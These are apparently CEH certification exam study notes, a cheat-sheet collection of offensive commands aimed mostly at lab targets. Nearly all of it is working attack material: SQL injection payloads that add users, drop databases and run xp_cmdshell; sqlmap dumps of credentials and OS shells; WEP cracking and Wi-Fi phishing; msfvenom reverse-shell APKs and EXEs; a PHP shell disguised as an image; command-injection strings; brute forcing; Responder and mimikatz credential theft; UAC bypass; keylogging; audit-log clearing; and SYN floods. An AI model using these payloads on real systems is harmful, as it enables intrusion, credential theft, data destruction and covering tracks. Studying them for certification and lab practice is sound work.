N-stalker web app vuln scanner
enter website
scan policy > owasp
start session
check if any vuln found
SQL Injection
Perform SQL INjection on MSSQL db
open login form
username> blah' or 1=1 --
password> empty
login success
______________________________________________________________________________________________________
Blind sql injection:
site is vulnerable to sql injection but results are not visible to attacker
attacker poses true or false question to db to check if blin sqli is possible
open login form
username> blah'; INSERT into login values values('john','apple123'); --
password> empty
a new user account created
open login form
username> blah'; create database mydatabase; --
password> empty
a new db created
open login form
username> blah'; drop database mydatabase; --
password> empty
database db deleted
open login form
username> blah'; exec master..xp_cmdshell 'ping $ip'; --
password> empty
start pinging to specifed ip
______________________________________________________________________________________________________
Perform SQLi again MSSQL to extract db's using sqlmap
open website of choice
developer tools > console >
documnet.cookie
output: cookie displayed
Enumerate databases
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jWydNf8wro=; ui-tabs-1=0" --dbs
-u target url
--cookie cookie header value
--dbs enumerate dbs
include all tests > yes
all enumerated dbs would be listed
Enumerate tables from moviescope db
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jWydNf8wro=; ui-tabs-1=0" -D moviescope --tables
all tables would be listed
dump user_login table from movie scope
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jWydNf8wro=; ui-tabs-1=0" -D moviescope -T user_login --dump
Acquire shell
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jWydNf8wro=; ui-tabs-1=0" --os-shell
output: os-shell>hostname
reterive standard outpt: Y
______________________________________________________________________________________________________
Detect sqli using DSSS
git clone https://github.com/stamparm/DSSS
python3 dsss.py -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jWydNf8wro=; ui-tabs-1=0"
output: vulenrable url would be displayed
______________________________________________________________________________________________________
Detect sqli using ZAP
ENTER URL > SCAN
CHECK IF SQL VULERNABILITY EXIST
Hacking Wireless Networks
WLAN 1EEE 802.11
SSID Service set identifier - wlan name
encyrption > wep (exploitable vulnerabilities), wpa, wpa2
_______________________________________________________________________________
Find wifi networks in range using net surveyour
list AP's, with SSIS, BSSID ,Strength
also output report
_______________________________________________________________________________
Find wifi networks and sniff packets using wash and wireshark
airmon-ng check kill
to kill interferring processess
airmon-ng start wlan0
promiscous mode & name changed to wlan0mon
wash -i wlan0mon
show wps enabled devices
open wireshark
interface > wlan0mon > pkts will be displayed and captured
_______________________________________________________________________________
Perform wireless attacks
***Find hidden SSID's using Aircrack-ng
airmon-ng check kill
to kill interferring processess
airmon-ng start wlan0
promiscous mode & name changed to wlan0mon
airodump-ng wlan0mon
hops from channel to channel and show all AP's
airodump-ng wlan0mon --bssid B4:75:0E:89:00:60
capture IV from target AP
list clients connected to target
send de-auth pakts to client 1
aireplay-ny --deauth 15 -a B4:75:0E:89:00:60 -c 20:A6:0C:30:23:D3 wlan0mon
--deauth activates deauthentication
15 pkts to be sent
-a access point mac
-c dest. mac addr
wlan0mon wireless interface
get error ? re issue commands
our source mac is not associated with ap's mac the pkts
usually get ignored and deauth pkts would be replied which contains SSID of AP.
_______________________________________________________________________________
Crack WEP using Wifiphisher
apt-get install libnl-3-dev libnl-genl-3-dev
apt-get install libssl-dev
git clone https://github.com/wifiphisher/roguehostapd
cd rouguehostapd
python setup.py install
git clone https://github.com/wifiphisher/wifiphisher
cd wifiphisher
python3 setup.py install
wifiphisher --force-hostapd
output: starting wifiphisher
display all AP's
select CEH-LABS as AP to phish
choose phish method > network manager connect
a fake open wifi network would be created with same name CEH-LABS
CONNECT with it from your phone
notfifiication will be recevied to update android
prompt will appear for user to enter password
this is the password for orginal CEH-LABS
_______________________________________________________________________________
CRACK wep NETWORK USING Aircrack-ng
airmon-ng check kill
to kill interferring processess
airmon-ng start wlan0
promiscous mode & name changed to wlan0mon
airodump-ng wlan0mon
hops from channel to channel and show all AP's
airodump-ng wlan0mon --encrypt wep
show only AP's with wep encryption enabled
before proceeding, check if injection attack is possible
aireplay-ng -9 -e CEH-LABS -a B4:75:0E:89:00:60 wlan0mon
-9 TESTS injection
-a access point mac
-e Target-IP SSID
wlan0mon wireless interface
IF OUTOUT : injection is working
airodump-ng wlan0mon --bssid B4:75:0E:89:00:60 -c 1 -w WEPcrack
-c channel on which target ap is running
wepcrack filename to store captured IV's
in parallel: aireplay-ny -3 -h 20:A6:0C:30:23:D3 -b B4:75:0E:89:00:60 wlan0mon
GENERATE ARP POSIONING IN NETWORK
ap's will rebroadcast arp packets and new iv's would be generated
wait untill 20,000 arp pkts captured in netwok
press control c to stop pkt capture of airodump
aircrack-ng WEPcrack-01.cap
decrypt and provide key
_______________________________________________________________________________
Crack WPA network using Fern Wifi cracker
select interface > wlan0 > monitor mode enabled
scan for AP's
select any AP from list
browse wordlist
open
brute force
Hacking Mobile Applications
Hack andoird by binary payload
msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=10.10.10.13 R > backdoor.apk
use exploit/multi/handler
exploit -j -z
execute app on other side
meterpreter
________________________________________________________________________________________
Harvest creds using SET
run SET
1-social eng attacks > 3-cred harvestor attack
2 site cloner > send clone site link and get creds
________________________________________________________________________________________
launch DOS on target using LOIC from android
run apk > enter ip>start
________________________________________________________________________________________
Exploit android platform through ADB using phonesploit
apt-get install adb
git clone https://github.com/01010000-kumar/PhoneSploit
cd PhoneSploit
python3 -m pip install colorama
python3 phonesploit.py
enter3 : connect a new phone
enter ip
connected
enter 4 : get shell on phone
$pwd
________________________________________________________________________________________
Secure andoroid using various android security tools
method 1:
sixo online apk analyzer
drop apk here and analyze
method 2:
AVC UnDroid
select APK and analyze
method 3:
using quixxi vuln scanner
upload apk and check if CVE exist
________________________________________________________________________________________
Secure Android devices from Malicious Apps using malwarebyets security
install in phone and scan
IOT and OT Hacking
protocols : mqtt modbus zigbee ble 5g
use ghdb on exploit db
search > scada > find systems for default passwords
using shodan
port 1833 default mqtt over tcp port
search > port:1833
modbus enabled devices
search > port:502
search using PLC Name
search > "schneider electric"
using geo location
SCADA Country:"US"
______________________________________________
CAPTURE IOT Device traffic
ubuntu machine
sudo snap install mqtt-explorer
mqtt-explorer
gui will open
host,name> mqtt.eclipse.org
protocol>mqtt
port >1883
validate cert>on
connect
device would connect and show all its details
wireshark will also capture all connection traffic against mqtt protocol
Topics:
Reconnaissance
Scanning
Enumeration
Packet sniffing
Vulnerability analysis to identify security loopholes in the target organization’s network, communication infrastructure, and end systems, etc.
System hacking, steganography
Network scanning to identify live and vulnerable machines in a network.
OS banner grabbing, service, and user enumeration.
Different types of cryptography attacks.
Web application attacks
SQL injection attacks.
Tools:
Scanning
nmap (strongly!)
Zenmap
Sniffing
Wireshark (strongly!)
Rainbow tables
RainbowCrack
SQL Injection tools
sqlmap
Password brute-forcing tools
Hydra
John The Ripper
WordPress Hacking
wpscan
Criptography
hashcalc
Veracrypt
Steganography
Quick Stego
1) Nmap
2) Snow — Stegnography
3) Open Stego
3) Wpscan
4) WireShark
5) SqlMap
6) OWASP ZAP
7) Hashcat
8) John
9) Hydra
10) Veracrypt
11) Crypttool
12) Hash Calculator
13) MD5 Calculator
14) PhoneSploit
15) MetaSploit
16) BCTextEncoder
Windows:
Windows
There were more windows based questions so you have to practice on windows GUI tools like mentioned below.
1) “Open Stego” for Stegnography
https://www.openstego.com/
2) “WireShark” for Pcap analysis
https://www.wireshark.org/download.html
3) “ZAP” for SQLInjecion exploit
https://www.zaproxy.org/download/
4) “Veracrypt” for Disk Decryption
https://www.veracrypt.fr/en/Downloads.html
5) “Hash calculator” to find the hash of the file
https://www.slavasoft.com/hashcalc/
6) “MD5 Calculator” to compare the hashes
http://www.md5calculator.com/
7) “Cryptool” and “BCTextEncoder” to Crack the encoded files
https://www.jetico.com/free-security-tools/encrypt-text-bctextencoder
Windows based Commands which will help you to find the answers.
1) net user — For Domain Users Enumeration
2) snow.exe -C -p “password” stegfile.txt
3) type C:\path.txt — It displays the content of the path.txt file.
4) dir
5) cd
6) hostname
7) whoami
8) PWd
Linux based tools
1) Nmap
2) wpscan
3) sqlmap
4) hashcat
5) john
6) Hydra
7) PhoneSploit
8) Metasploit
Commands were used during the exam
-------------Tools, Commands and Techniques for CEH Master---------------
Nmap
nmap -sn 170.16.0.1/24 -oN nmap.txt
nmap -O 170.16.0.1/24 -oN namp-OS.txt
namp -sC -sV -sS 170.16.0.20 -oN namp-all.txt
nmap -sn 10.10.10.10/24 -oN nmap.txt
nmap -sC -sV -sS -O 10.10.10.11 -oN nmap.txt
nmap -A 10.10.10.10/24 -oN nmap.txt
nmap -sn -O 172.16.43.1/24
nmap -sS -sC -sV -O 172.16.43.3 -oN nmap.txt
nmap 172.16.43.1/24
nmap -sV -sC -pA nmap 10.10.10.x
nmap -sC -sV -v -oN nmap.txt 10.10.10.10
nmap -sU -sV -A t4 -v -oN udp.txt 10.10.10.1
nmap -f IP
nmap -sn -PR IP
nmap -sn -PE ip-range
nmap -sn 10.10.10.10/24
nmap -sC -sS -sV -O IP
nmap -A IP
-sn disable port scan
-PR ARP ping scan
-PU UDP ping scan
-PE ICMP ECHO ping scan
-f Splits IP into fragment packets
nmap --script smb-os-discovery.nse IP
Displays OS, Computer-Name, Domain, WorkGroup and Ports.
------------------------
Nmap -Pn -p 21 target > ftp
grep -B 5 open ftp
--------------------------
Nmap -Pn -p 3389 target > rdp
grep -B 5 open rdp
-------------------------
Nmap -Pn -p 3306 target > mysql
grep -B 5 open mysql
2) wpscan
wpscan -u james -P /password.txt — url http://172.16.0.27:8080/CEH/
wpscan --url http://172.16.0.27:8080/CEH/ -u james -P /path/pass.txt
wpscan --url https://example/ --enumerate u (To enumerate the user)
WPSCAN
User Enumeration : wpscan --url https://example/ --enumerate u
Bruteforce: wpscan --url https://example/ --passwords wordlist.txt --usernames samson
wpscan --url http://10.10.10.12:8080/CEG --enumerate u
msfconsole
use axiliary/scanner/http/wordpress_login_enum
PASS_FILE /root/Desktop/wordlists/Passwords.txt
set RHOSTs 10.10.10.12
set RPORT 8080
set TARGETURI http://10.10.10.12:8080/CEH/
set USERNAME admin
run
3) sqlmap
I didn’t used “sqlmap” for any sqlinjection related question, incase if you get any questions related to sqlinjection use github repo you will find some usefull commands.
https://github.com/cmuppin/CEH/blob/main/SQL%20Injection
OWASP ZAP
Open the ZAP
Add the webiste name to Autoscan
Click on the Alert tab to know about Vulnerabilities
---------------------------------------------------------------------------------------------------------------------------------------------------------
SQL MAP
Open the vulnerable website
Copy the cookie from the inspect element
Open the terminal to use sqlmap
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl="; --dbs
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=; ui-tabs-1=0" -D moveiscope --tables
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=; ui-tabs-1=0" -D moviescope -T user-Login --dump
You will get all the Useraname and Passwords of the website.
------------------------------------------------------------------------------------------------------------------------------------------------------
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=; ui-tabs-1=0" --os-shell
It opens up the Interactive OS shell.
-------------------------------------------------------------------------------------------------------------------------------------------------------
mysql -U qdpmadmin -h 192.168.1.8 -P passwod
show databases;
use qdpm;
show tables'
select * from users;
show dtabases;
use staff;
show tables;
select * from login;
select * from user;
When you have username and Password for the database.
----------------------------------------------------------------------------------------------------------
URL = http://testphp.vulnweb.com/artists.php?artist=1
Find DBs = sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs --batch
Result is DB name acuart
Find Tables = sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --table --batch
Result is table name users
Find columns = sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns --batch
Dump table = sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --dump --batch
Dump the DB = sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --dump-all --batch
Reference = https://www.hackingarticles.in/database-penetration-testing-using-sqlmap-part-1/
Using cookies
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --cookie='JSESSIONID=09h76qoWC559GH1K7DSQHx' --random-agent --level=1 --risk=3 --dbs --batch
SQL Injection
in login page enter blah' or 1=1-- as username and click login without entering the password
OS Shell = sqlmap -u 'url' --dbms=mysql --os-shell
SQL Shell = sqlmap -u 'url' --dbms=mysql --sql-shell
4) Hashcat and john
If you get questions related to Hash caracking use this github repo you will find some usefull commands.
https://github.com/cmuppin/CEH/blob/main/Cryptography
Hash identifier and Hash cracking
Hash Identifier
https://www.onlinehashcrack.com/hash-identification.php
Hash-identifier (CLI)
Hash Crack
https://crackstation.net/
https://hashes.com/en/decrypt/hash
Hashcat -a 3 -m 900 hash.txt /rockyou.txt
-a attack mode
-m hashtype
900 md4
1000 NTLM
1800 SHA512CRYPT
110 SHA1 with SALT HASH
0 MD5
100 SHA1
1400 SHA256
3200 BCRYPT
160 HMAC-SHA1
Dictionary Attack
hashcat -m 0 -a 0 -o cracked.txt target_hashes.txt /usr/share/wordlists/rockyou.txt
-m 0 designates the type of hash we are cracking (MD5);
-a 0 designates a dictionary attack;
-o cracked.txt is the output file for the cracked passwords;
-target_hashes.txt is our input file of hashes;
-/usr/share/wordlists/rockyou.txt = Path to the wordlist
m - 0:MD5
100:SHA1
1400:SHA256
1700:SHA512
900:MD4
3200:BCRYPT
Also Important to check hash
#hash-identifier
#hash -m [file]
- Steps-
1. First identify hash - use `hash-identifier` OR `john filename` OR `cyberchef` OR any other online tool
2. Crack - `hashcat -m 1800 test.hash -o crack.txt /usr/share/wordlists/rockyou.txt`, -m (Hash mode, give number of the hash type identified above) OR `hashcat -m 1800 hash...... /usr/share/wordlists/rockyou.txt`
John
1. First analyze hash type - `john hashfile.hash`
2. Then crack hash - `john hashfile.hash --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA1`
3. Show the cracked password - `john --show --format=Raw-SHA1 hashfile.hash` OR `john --show hashfile.hash
Single crack mode: john --single --format=raw-sha1 crack.txt
Crack the password in file using wordlist: john --wordlist=/usr/share/john/password.lst --format=raw-sha1 crack.txt (Crack.txt here contains the hashes)
Cracking service credentials like ss
1. First have to convert the hash file to JOHN format : ssh2john /home/text/.ssh/id_rsa > crack.txt (Now we need to crack this crack.txt file with John The Ripper)
2. john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt
To crack ZIP
1. zip2john file.zip > crack.txt
2. john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt
Notes:
–wordlist can be written as -w also
john crack.txt --wordlist=rockyou.txt --format=Raw-SHA256
5) Netuser
Snow.exe -C -p “given_password” file_name
6) Hydra
hydra -L /user.txt -P /password.txt ftp://172.0.16.21
Hydra
- **FTP**: hydra -l user -P passlist.txt [ftp://10.10.46.122](ftp://10.10.46.122/)
hydra -L userlist.txt -P passlist.txt [ftp://10.10.46.122](ftp://10.10.46.122/)
- SSH: hydra -l <username> -P <full path to pass> 10.10.46.122 -t 4 ssh
- Post Web Form: hydra -l <username> -P <wordlist> 10.10.46.122 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V
- `hydra -L /root/Desktop/Wordlists/Usernames.txt -P /root/Desktop/Wordlists/Passwords.txt ftp://[IP]`
- `hydra -l root -P passwords.txt [-t 32] <IP> ftp
- `hydra -L usernames.txt -P pass.txt <IP> mysql
- `hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V`
- `hydra -V -f -L <userslist> -P <passwlist> ***rdp***://<IP>`
- `hydra -P common-snmp-community-strings.txt target.com snmp
- `hydra -l Administrator -P words.txt 192.168.1.12 smb t 1
- `hydra -l root -P passwords.txt <IP> ssh
FOR FTP
If username is already given = hydra -l samson -P -P /usr/share/wordlists/rockyou.txt 192.168.1.101 ftp
If password is given and needs to find username = hydra -L user.txt -p 123 192.168.1.101 ftp
If both username and password is not given = hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.1.101 ftp
Reference = https://www.hackingarticles.in/comprehensive-guide-on-hydra-a-brute-forcing-tool/
FOR SSH
hydra -L /usr/share/wordlists.rockyou.txt -P /usr/share/wordlists/rockyou.txt 192.168.1.101 -t 4 ssh
FOR HTTP FORM
hydra -L [user] -P [password] [IP] http-post-form "/:usernam=^USER^ & password=^PASS^:F=incorrect" -V
Hydra -l james -P given_wordlist ftp://target
7) Phonesploit
To exploit the Android device and get the reverse shell, these commands will help you and the phonesploit will be installed in the root folder, if you don't find the phonesploit use the command like “find phonesploit”.
PhoneSploit
https://n00bie.medium.com/hacking-android-using-phonesploit-ffbb2a899e6
apt-get install adb
git clone github.com/01010000/phonesploit
cd phonesploit
pyhton3 phonesploit.py
3 (Connect to new phone)
Add IP address of android device
4 (Access shell on phone)
IP address again of android device
pwd
ls
cd sdcard
ls
cd downloads
cat accnt-info.txt
https://github.com/cmuppin/CEH/blob/main/Android
8) Metasploit
If you get any questions related to netbios, SMB use metasploit.
9) Enumeration
SNMP Enumeration
nmap -sU -P 161 IP
snmp-check IP
Displays Network Info, Network Interfaces, Network IP, Routing Info, TCP connection and listening, process, Storage info, File System and Device Info.
NetBios Enumeration
nbstat -a IP
-a netbios name table
-c list contents of Netbios name cache
net use
Displays connection status, Shared folder/drive and Network Information.
10) Steganography
snow.exe -C -p "test" confidential.txt
-C compressing / uncompressing
-p password
Open Stego
GUI tool
11) Wireshark DDOS and Passwords
https://www.comparitech.com/net-admin/wireshark-cheat-sheet/
https://www.hackers-arise.com/post/2018/09/27/network-forensics-part-2-detecting-and-analyzing-a-scada-dos-attack
To find DOS (SYN and ACK) : tcp.flags.syn == 1 , tcp.flags.syn == 1 and tcp.flags.ack == 0
To find passwords : http.request.method == POST
To find DOS (SYN and ACK) : tcp.flags.syn == 1 , tcp.flags.syn == 1 and tcp.flags.ack == 0
To find passwords : http.request.method == POST
More reference: https://www.comparitech.com/net-admin/wireshark-cheat-sheet/
To find DOS: Look for Red and Black packets with around 1-2 simple packets in between and then pick any packet and check the Source and Destination IP with port(As per question)
12) Easy - Command Injection
Execute 127.0.0.1 & & net user
Execute 127.0.0.1 & & net user & & ver command
Execute 127.0.0.1 & & net user & & getmac
13) Medium - Command Injection
127.0.0.1&net user
127.0.0.1&net user&sc query&systeminfo
127.0.0.1&;&ipconfig
14) High - Command Injection
127.0.0.1|net user
15) FILE UPLOAD – WINDOWS
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw
type GIF98 before PHP code and save as shell.jpeg.
Copy the uploaded path
Click on command injection and type below command
|copy C:\xampp\htdocs\DVWA\hackable\uploads\shell.jpeg
C:\xampp\htdocs\DVWA\hackable\uploads\aa.php
Msfconsole
Use multi/handler
Set payload php/meterpreter/reverse_tcp
Set lhost
Set lport
Run
16) Steghide
- This tool can only extract data from jpg/jpeg images.
- `steghide extract -sf <media filename>`
- `stegcracker <file> [<wordlist>]` → for brute forcing the password of password protect files
Gem: https://www.hackingarticles.in/comprehensive-guide-to-steghide-tool/
17) Banner-grabbing
Whatweb
cURL
Wget
Telnet
Netcat
Nikto
Nmap
Dmitry
18) Directory Busting
Dirb
- `dirb <URL>`(using default word list - /usr/share/dirb/wordlists/common.txt), `dirb http://webscantest.com`
- `dirb <URL> <wordlist_location>`
- `dirb http://10.10.230.124/ -X .php,.html` **→ Enumerating Directory with Specific Extension List**
- `dirb http://10.10.230.124/ -o output.txt` → **Save Output to Disk**
DirBuster
- It is a Graphical (GUI) Tool.
Gobuster
-Commands
- `gobuster dir -u http://10.10.230.124/ -w /usr/share/wordlists/dirb/common.txt 2>/dev/null`
- `gobuster dir -u http://10.10.230.124/ -x txt,html -w /usr/share/wordlists/dirb/common.txt 2>/dev/null` **→ Enumerating Directory with Specific Extension List**
- `gobuster dir -u http://10.10.230.124/dvwa -w /usr/share/wordlists/dirb/common.txt -o output.txt 2>/dev/null` → **Save Output to Disk**
18) CEWL
- `cewl example.com -m 5 -w words.txt`
- where cewl is the tool, [example.com](http://example.com/) is the site, -m is to specify the minimum length of the word , -w is to specify the output file*
Exam Cheats sheets (1):
NMAP
1. Scan all ports
- nmap -p- 10.10.10.10
2. Scan all opened ports with more details
- nmap -p443,80,53,135,8080,8888 -A -O -sV -sC -T4 -oN nmapOutput 10.10.10.10
- https://www.stationx.net/nmap-cheat-sheet/
CEWL
1. Cewl function
--> Generate wordlist from a website wording
2. How to use Cewl?
--> cewl -m 4 -w wordlist.txt http://10.10.10.10
--> cewl.exe example.com -m 5 -w words.txt
-m = Minimum character that will be put inside the wordlist result
FUZZING
1. Fuzzing
--> gobuster -e -u http://10.10.10.10 -w /usr/share/wordlists/medium.txt
--> dirb http://10.10.10.10 /usr/share/wordlists/medium.txt
HASHCAT
1. Hashcat
--> Crack hash value to plaintext
2. Crack NTLMv2
--> hashcat -m 5600 ntlmhash.txt rockyou.txt --force
--> hashcat.exe -m hash.txt rokyou.txt -O
--force = Running utilizing CPU processing
-O = Process more faster
--> Using "--force" will facing some problems when running the command
--> Download hashcat binaries at official website of hashcat
--
Hydra
1. Brute Force using Hydra
--> hydra -l root -P passwords.txt [-t 32] <IP> ftp
--> hydra -L usernames.txt -P pass.txt <IP> mysql
--> hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
--> hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
--> hydra -t 4 -V -f -l administrator -P rockyou.txt rdp://192.168.34.16
--> hydra -P common-snmp-community-strings.txt target.com snmp
--> hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
--> hydra -l root -P passwords.txt <IP> ssh
2. Description
-l Single Username
-L Username list
-p Password
-P Password list
-t Limit concurrent connections
-V Verbose output
-f Stop on correct login
-s Port
3. Reference
--> https://securitytutorials.co.uk/brute-forcing-passwords-with-thc-hydra/
--> https://tryhackme.com/room/hydra
hydra -l root -P passwords.txt [-t 32] <IP> ftp
hydra -L usernames.txt -P pass.txt <IP> mysql
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
hydra -P common-snmp-community-strings.txt target.com snmp
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
hydra -l root -P passwords.txt <IP> ssh
Johntheripper
1. MD5
--> john --format=raw-md5 password.txt
Reference
--> https://medium.com/@sc015020/how-to-crack-passwords-with-john-the-ripper-fdb98449ff1
Netdiscover
1. Discover hosts
--> netdiscover -i eth0
--> netdiscover -r 192.168.1.0/24
--> netdiscover -i eth0 -P -r 192.168.1.0/24
-i : Interface de Rede (eth0)
-P : Print (Mostra o Resultado)
-r : Range (192.168.1.0/24)
2. Reference
--> https://kalilinuxtutorials.com/netdiscover-scan-live-hosts-network/
--> https://www.100security.com.br/netdiscover
Responder
1. Download Responder tool
--> git clone https://github.com/lgandx/Responder
2. Launch Responder
--> python Responder.py -I eth0
--> Check LLMNR / NBT-NS / DNS/MDNS are ON
3. Search shared file on victim host
--> \\hackme
4. Attacker host (Responder)
--> Received NTLMv2 Hash of the victim
5. Crack Hash value to get the password using Hashcat
--> hashcat -m 5600 hashes.txt rockyou.txt -D1
--> hashcat -m 5600 hashes.txt rockyou.txt -D1 --show --user
6. SMB Relay
--> python Multirelay.py -h
--> python Multirelay.py -t <Target-IP> -u ALL
--> Before running Multirelay script, need to turn OFF (SMB and HTTP) options
--> vim Responder.conf
--> Received hash value of the victim
--> Forward to the targeted file, to get access as the victim
7. Show password in victim host
--> help
--> mimi coffee
--> mimi sekurlsa::logonpasswords
8. RunFinger
--> Only work when SMB is disabled.
--> python RunFinger.py -h
--> python RunFinger.py -i 192.168.1.0/24
Reference
--> https://notsosecure.com/pwning-with-responder-a-pentesters-guide/
--> https://www.youtube.com/watch?v=rjRDsXp_MNk&ab_channel=RajganeshPandurangan
--> https://www.youtube.com/watch?v=LHv1ud5lnX0&ab_channel=Joostvan%27tZand
Searchsploit
1. Update Searchsploit
--> searchsploit -u
2. Search vulnerabilities
--> searchsploit linux kernal
--> searchsploit -t windows 10 (Focus on the Exploit Title)
3. Copy exploit
--> cp /usr/share/exploitdb/exploits/multiple/remote/8648.py /root/Desktop (Sample)
4. Complete sample
--> searchsploit “Linux Kernel”
--> searchsploit -m 7618 — Paste the exploit in the current directory
--> searchsploit -p 7618[.c] — Show complete path
--> searchsploit — nmap file.xml — Search vulns inside a Nmap XML result
4. Reference
--> https://www.youtube.com/watch?v=29GlfaH5qCM&ab_channel=HackerSploit
SQLmap
Let’s take an example
--> http://testphp.vulnweb.com/artists.php?artist=1
1. Database command
--> sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs --batch
-u: target URL
–dbs: fetch database name
–batch: This will leave sqlmap to go with default behavior whenever user’s input would be required
2. Table command
--> sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --table --batch
-D: DBMS database to enumerate (fetched database name)
–tables: enumerate DBMS database table
3. Collumn command
--> sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns --batch
-T: DBMS table to enumerate (fetched table name)
–columns: enumerate DBMS database columns
4. Retrieve all the data
--> sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --dump --batch
–dump: dump all information of DBMS database
5. Reference
--> https://www.hackingarticles.in/database-penetration-testing-using-sqlmap-part-1/
TCPdump
1. Reference
--> https://hackertarget.com/tcpdump-examples/
--> https://danielmiessler.com/study/tcpdump/
Wireshark
Reference
--> https://ismailtasdelen.medium.com/wireshark-cheat-sheet-43ebca1fbfa7
Wpscan
1. Brute force username/password login
--> wpscan --url http://10.10.10.10/ -U 'admin' -P /usr/share/wordlists/medium.txt
2. Normal scanning
--> wpscan --url <URL>
3. Enumerate User
--> wpscan --url https://10.10.10.10/ --enumerate u
4. Wordpress enumerate user using metasploit
--> use auxiliary/scanner/http/wordpress_login_enum
--> FILE_PASS
--> RHOST (Target)
--> RPORT
--> TARGETURI (URL) - [http://[IP Address of Windows Server 2016]:8080/CEH]
--> Username
5. Reference
--> https://www.youtube.com/watch?v=gg_yUo3hVeg&ab_channel=WPCasts
Exam Cheats sheets (2):
FOOTPRINTING AND RECONASIANCE
FIREBUG ADD-ON
ENUMERATION
GLOBAL NETWORK INVENTORY
ADVANCED IP SCANNER
-----------------------------
NETBIOS ENUMERATION
SUPERSCAN
NETBIOS ENUMERATOR
NULL SESSION NETBIOS
NET USE \\IP\FOLDER ""\USER:""
------------------------------
SNMP 161 BRUTE FORCE
NMAP -sU -p 161 --script=snmp-brute IP
METASPLOIT ( AUXILIARY/SCANNER/SNMP/SNMP_LOGIN) ( AUXILIARY/SCANNER/SNMP/SNMP_ENUM)
----------------------------------------------------------------------------------------
LDAP ENUMERATION
ACTIVE DIRECTORY EXPLORER
-----------------------------------
SAMBA ENUMERATION
ENUM4LINUX
VULNERABILITY ANALYSIS
NESSUS
NIKTO
SYSTEM HACKING
-------------------------------------
DUMPING AND CRACKING SAM HASHES
PWDUMP7
OPCRACK PARA CRACKING HASHES
-------------------------------------
CREATING RAINBOW TABLES
WINRTGEN (PARA CREAR TABLAS)
RAINBOWCRACK (PARA ROMPER LOS HASHES CON LA TABLA QUE CREAMOS ARRIBA)
-----------------------------------------------------------------------
AUDITING SYSTEM
LOPHTCRACK
CREATE A VIRUS WITH MSFVENOM (msfvenom -p windows/meterpreter/reverse_tcp -a x86 -f exe (optional -e x86/shikata_ga_nai -b "\x00") LHOST=IP LPORT=PORT -o RUTA)
Iniciar msfconsole, use multi/handler , set payload windows/meterpreter/reverse_tcp
METERPRETER RUN VNC PARA VER EL DESKTOP DEL EQUIPO REMOTO
-----------------------------------------------------------------------
ESCALATE PRIVILEGE WITH METASPLOIT
run post/windows/gather/smart_hashdump
use exploit/windows/local/bypassuac_fodhelper // set SESSION 1 // set payload windows/meterpreter/reverse_tcp
getsystem (para obtener high priv)
--------------------------------------------------------------------------
download bootmgr (descarga archivos)
keyscan_start (Keylogger)
SPYTECH SPYAEGENT / Power SPY
--------------------------------------------------------------------------
HIDING FILES USING NTFS STREAMS
type c:\file > c:\secretfile:file
mklink backdoor.exe secretfile:file
-------------------------------------------------------------------------
HIDING FILES USING WHITE SPACE STEG
SNOW (snow -C -m "blabla" -p "magic" secretfile secretfile2 // snow -C -p "magic" secretfile2)
-------------------------------------------------------------------------
IMAGE STEGANOGRAPHY
OPENSTEGO // QuickStego
-------------------------------------------------------------------------
CLEARING AUDIT LOGS
auditpol /get /category:* (ver las audit policies)
auditpol /set /category:"system","account logon" /success:enable /failure:enable (habilitar audit policies)
auditpol /clear /y (clear all audit policies)
-------------------------------------------------------------------------
COVERT_TCP ( cc -o covert_tcp covert_tcp.c) (./covert_tcp -dest IPdest -source IPsrc -source_port 00 -dest_port 11 -server -file /secretfile
-------------------------------------------------------------------------
THEFATRAT
opcion 06 // opcion 03 // payload // opcion 07 // opcion 02 // BadDoc // y
-------------------------------------------------------------------------
LLMNR & NETBIOS
RESPONDER
responder -I tun0 // john responder_file
DENIAL OF SERVICE
--------------------------------------------------------------------------
SYN FLOODING METASPLOIT (auxiliary/dos/tcp/synflood timeout 20k)
HPING3 (hping3 -S IPvic -a IPatt -p 22 --flood)
HOIC
---------------------------------------------------------------------------
SESSION HIJACKING
ZAP Proxy (Add Break Tab // )
HACKING WEB SERVERS
FOOTPRINTING:
SKIPFISH like gobuster
httprecon tool
ID SERVE
UNISCAN -h URL -qweds
---------------------------------------------------------------------------
BRUTEFORCE
HYDRA
JOHN
HASHCAT
HACKING WEB APPLICATIONS
PARAMETER TAMPERING
XSS (<script>alert("HELLO")</script>)
----------------------------------------------------------------------------
ENUMERATION
